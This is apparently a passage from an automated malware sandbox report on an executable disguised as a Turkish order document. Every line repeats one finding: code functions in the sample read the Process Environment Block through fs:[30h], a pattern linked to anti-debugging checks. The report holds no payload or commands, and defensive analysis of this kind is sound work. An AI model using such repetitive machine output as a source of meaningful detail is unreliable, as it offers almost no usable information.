            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019003E9 mov eax, dword ptr fs:[00000030h]3_2_019003E9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01910310 mov ecx, dword ptr fs:[00000030h]3_2_01910310
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192A30B mov eax, dword ptr fs:[00000030h]3_2_0192A30B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192A30B mov eax, dword ptr fs:[00000030h]3_2_0192A30B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192A30B mov eax, dword ptr fs:[00000030h]3_2_0192A30B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018EC310 mov ecx, dword ptr fs:[00000030h]3_2_018EC310
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C8324 mov eax, dword ptr fs:[00000030h]3_2_019C8324
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C8324 mov ecx, dword ptr fs:[00000030h]3_2_019C8324
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C8324 mov eax, dword ptr fs:[00000030h]3_2_019C8324
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C8324 mov eax, dword ptr fs:[00000030h]3_2_019C8324
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019BA352 mov eax, dword ptr fs:[00000030h]3_2_019BA352
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01998350 mov ecx, dword ptr fs:[00000030h]3_2_01998350
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0197035C mov eax, dword ptr fs:[00000030h]3_2_0197035C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0197035C mov eax, dword ptr fs:[00000030h]3_2_0197035C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0197035C mov eax, dword ptr fs:[00000030h]3_2_0197035C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0197035C mov ecx, dword ptr fs:[00000030h]3_2_0197035C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0197035C mov eax, dword ptr fs:[00000030h]3_2_0197035C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0197035C mov eax, dword ptr fs:[00000030h]3_2_0197035C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C634F mov eax, dword ptr fs:[00000030h]3_2_019C634F
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01972349 mov eax, dword ptr fs:[00000030h]3_2_01972349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01972349 mov eax, dword ptr fs:[00000030h]3_2_01972349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01972349 mov eax, dword ptr fs:[00000030h]3_2_01972349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01972349 mov eax, dword ptr fs:[00000030h]3_2_01972349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01972349 mov eax, dword ptr fs:[00000030h]3_2_01972349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01972349 mov eax, dword ptr fs:[00000030h]3_2_01972349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01972349 mov eax, dword ptr fs:[00000030h]3_2_01972349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01972349 mov eax, dword ptr fs:[00000030h]3_2_01972349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01972349 mov eax, dword ptr fs:[00000030h]3_2_01972349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01972349 mov eax, dword ptr fs:[00000030h]3_2_01972349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01972349 mov eax, dword ptr fs:[00000030h]3_2_01972349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01972349 mov eax, dword ptr fs:[00000030h]3_2_01972349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01972349 mov eax, dword ptr fs:[00000030h]3_2_01972349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01972349 mov eax, dword ptr fs:[00000030h]3_2_01972349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01972349 mov eax, dword ptr fs:[00000030h]3_2_01972349
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0199437C mov eax, dword ptr fs:[00000030h]3_2_0199437C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01970283 mov eax, dword ptr fs:[00000030h]3_2_01970283
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01970283 mov eax, dword ptr fs:[00000030h]3_2_01970283
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01970283 mov eax, dword ptr fs:[00000030h]3_2_01970283
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192E284 mov eax, dword ptr fs:[00000030h]3_2_0192E284
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192E284 mov eax, dword ptr fs:[00000030h]3_2_0192E284
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019002A0 mov eax, dword ptr fs:[00000030h]3_2_019002A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019002A0 mov eax, dword ptr fs:[00000030h]3_2_019002A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019862A0 mov eax, dword ptr fs:[00000030h]3_2_019862A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019862A0 mov ecx, dword ptr fs:[00000030h]3_2_019862A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019862A0 mov eax, dword ptr fs:[00000030h]3_2_019862A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019862A0 mov eax, dword ptr fs:[00000030h]3_2_019862A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019862A0 mov eax, dword ptr fs:[00000030h]3_2_019862A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019862A0 mov eax, dword ptr fs:[00000030h]3_2_019862A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C62D6 mov eax, dword ptr fs:[00000030h]3_2_019C62D6
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FA2C3 mov eax, dword ptr fs:[00000030h]3_2_018FA2C3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FA2C3 mov eax, dword ptr fs:[00000030h]3_2_018FA2C3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FA2C3 mov eax, dword ptr fs:[00000030h]3_2_018FA2C3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FA2C3 mov eax, dword ptr fs:[00000030h]3_2_018FA2C3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018FA2C3 mov eax, dword ptr fs:[00000030h]3_2_018FA2C3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019002E1 mov eax, dword ptr fs:[00000030h]3_2_019002E1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019002E1 mov eax, dword ptr fs:[00000030h]3_2_019002E1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019002E1 mov eax, dword ptr fs:[00000030h]3_2_019002E1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018E823B mov eax, dword ptr fs:[00000030h]3_2_018E823B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C625D mov eax, dword ptr fs:[00000030h]3_2_019C625D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019AA250 mov eax, dword ptr fs:[00000030h]3_2_019AA250
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019AA250 mov eax, dword ptr fs:[00000030h]3_2_019AA250
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01978243 mov eax, dword ptr fs:[00000030h]3_2_01978243
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01978243 mov ecx, dword ptr fs:[00000030h]3_2_01978243
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F6259 mov eax, dword ptr fs:[00000030h]3_2_018F6259
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018EA250 mov eax, dword ptr fs:[00000030h]3_2_018EA250
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018E826B mov eax, dword ptr fs:[00000030h]3_2_018E826B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A0274 mov eax, dword ptr fs:[00000030h]3_2_019A0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A0274 mov eax, dword ptr fs:[00000030h]3_2_019A0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A0274 mov eax, dword ptr fs:[00000030h]3_2_019A0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A0274 mov eax, dword ptr fs:[00000030h]3_2_019A0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A0274 mov eax, dword ptr fs:[00000030h]3_2_019A0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A0274 mov eax, dword ptr fs:[00000030h]3_2_019A0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A0274 mov eax, dword ptr fs:[00000030h]3_2_019A0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A0274 mov eax, dword ptr fs:[00000030h]3_2_019A0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A0274 mov eax, dword ptr fs:[00000030h]3_2_019A0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A0274 mov eax, dword ptr fs:[00000030h]3_2_019A0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A0274 mov eax, dword ptr fs:[00000030h]3_2_019A0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019A0274 mov eax, dword ptr fs:[00000030h]3_2_019A0274
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F4260 mov eax, dword ptr fs:[00000030h]3_2_018F4260
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F4260 mov eax, dword ptr fs:[00000030h]3_2_018F4260
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F4260 mov eax, dword ptr fs:[00000030h]3_2_018F4260
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F2582 mov eax, dword ptr fs:[00000030h]3_2_018F2582
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F2582 mov ecx, dword ptr fs:[00000030h]3_2_018F2582
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192E59C mov eax, dword ptr fs:[00000030h]3_2_0192E59C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01924588 mov eax, dword ptr fs:[00000030h]3_2_01924588
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019145B1 mov eax, dword ptr fs:[00000030h]3_2_019145B1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019145B1 mov eax, dword ptr fs:[00000030h]3_2_019145B1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019705A7 mov eax, dword ptr fs:[00000030h]3_2_019705A7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019705A7 mov eax, dword ptr fs:[00000030h]3_2_019705A7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019705A7 mov eax, dword ptr fs:[00000030h]3_2_019705A7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192A5D0 mov eax, dword ptr fs:[00000030h]3_2_0192A5D0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192A5D0 mov eax, dword ptr fs:[00000030h]3_2_0192A5D0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192E5CF mov eax, dword ptr fs:[00000030h]3_2_0192E5CF
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192E5CF mov eax, dword ptr fs:[00000030h]3_2_0192E5CF
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F65D0 mov eax, dword ptr fs:[00000030h]3_2_018F65D0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F25E0 mov eax, dword ptr fs:[00000030h]3_2_018F25E0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191E5E7 mov eax, dword ptr fs:[00000030h]3_2_0191E5E7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191E5E7 mov eax, dword ptr fs:[00000030h]3_2_0191E5E7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191E5E7 mov eax, dword ptr fs:[00000030h]3_2_0191E5E7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191E5E7 mov eax, dword ptr fs:[00000030h]3_2_0191E5E7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191E5E7 mov eax, dword ptr fs:[00000030h]3_2_0191E5E7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191E5E7 mov eax, dword ptr fs:[00000030h]3_2_0191E5E7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191E5E7 mov eax, dword ptr fs:[00000030h]3_2_0191E5E7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191E5E7 mov eax, dword ptr fs:[00000030h]3_2_0191E5E7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192C5ED mov eax, dword ptr fs:[00000030h]3_2_0192C5ED
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192C5ED mov eax, dword ptr fs:[00000030h]3_2_0192C5ED
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01986500 mov eax, dword ptr fs:[00000030h]3_2_01986500
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C4500 mov eax, dword ptr fs:[00000030h]3_2_019C4500
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C4500 mov eax, dword ptr fs:[00000030h]3_2_019C4500
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C4500 mov eax, dword ptr fs:[00000030h]3_2_019C4500
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C4500 mov eax, dword ptr fs:[00000030h]3_2_019C4500
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C4500 mov eax, dword ptr fs:[00000030h]3_2_019C4500
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C4500 mov eax, dword ptr fs:[00000030h]3_2_019C4500
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019C4500 mov eax, dword ptr fs:[00000030h]3_2_019C4500
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01900535 mov eax, dword ptr fs:[00000030h]3_2_01900535
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01900535 mov eax, dword ptr fs:[00000030h]3_2_01900535
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01900535 mov eax, dword ptr fs:[00000030h]3_2_01900535
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01900535 mov eax, dword ptr fs:[00000030h]3_2_01900535
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01900535 mov eax, dword ptr fs:[00000030h]3_2_01900535
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01900535 mov eax, dword ptr fs:[00000030h]3_2_01900535
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191E53E mov eax, dword ptr fs:[00000030h]3_2_0191E53E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191E53E mov eax, dword ptr fs:[00000030h]3_2_0191E53E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191E53E mov eax, dword ptr fs:[00000030h]3_2_0191E53E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191E53E mov eax, dword ptr fs:[00000030h]3_2_0191E53E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191E53E mov eax, dword ptr fs:[00000030h]3_2_0191E53E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F8550 mov eax, dword ptr fs:[00000030h]3_2_018F8550
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F8550 mov eax, dword ptr fs:[00000030h]3_2_018F8550
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192656A mov eax, dword ptr fs:[00000030h]3_2_0192656A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192656A mov eax, dword ptr fs:[00000030h]3_2_0192656A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192656A mov eax, dword ptr fs:[00000030h]3_2_0192656A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019AA49A mov eax, dword ptr fs:[00000030h]3_2_019AA49A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019244B0 mov ecx, dword ptr fs:[00000030h]3_2_019244B0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F64AB mov eax, dword ptr fs:[00000030h]3_2_018F64AB
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0197A4B0 mov eax, dword ptr fs:[00000030h]3_2_0197A4B0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018F04E5 mov ecx, dword ptr fs:[00000030h]3_2_018F04E5
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01928402 mov eax, dword ptr fs:[00000030h]3_2_01928402
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01928402 mov eax, dword ptr fs:[00000030h]3_2_01928402
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01928402 mov eax, dword ptr fs:[00000030h]3_2_01928402
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018EC427 mov eax, dword ptr fs:[00000030h]3_2_018EC427
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018EE420 mov eax, dword ptr fs:[00000030h]3_2_018EE420
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018EE420 mov eax, dword ptr fs:[00000030h]3_2_018EE420
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_018EE420 mov eax, dword ptr fs:[00000030h]3_2_018EE420
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01976420 mov eax, dword ptr fs:[00000030h]3_2_01976420
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01976420 mov eax, dword ptr fs:[00000030h]3_2_01976420
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01976420 mov eax, dword ptr fs:[00000030h]3_2_01976420
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01976420 mov eax, dword ptr fs:[00000030h]3_2_01976420
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01976420 mov eax, dword ptr fs:[00000030h]3_2_01976420
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01976420 mov eax, dword ptr fs:[00000030h]3_2_01976420
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_01976420 mov eax, dword ptr fs:[00000030h]3_2_01976420
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0191245A mov eax, dword ptr fs:[00000030h]3_2_0191245A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_019AA456 mov eax, dword ptr fs:[00000030h]3_2_019AA456
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192E443 mov eax, dword ptr fs:[00000030h]3_2_0192E443
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192E443 mov eax, dword ptr fs:[00000030h]3_2_0192E443
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192E443 mov eax, dword ptr fs:[00000030h]3_2_0192E443
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192E443 mov eax, dword ptr fs:[00000030h]3_2_0192E443
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192E443 mov eax, dword ptr fs:[00000030h]3_2_0192E443
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192E443 mov eax, dword ptr fs:[00000030h]3_2_0192E443
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192E443 mov eax, dword ptr fs:[00000030h]3_2_0192E443
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeCode function: 3_2_0192E443 mov eax, dword ptr fs:[00000030h]3_2_0192E443
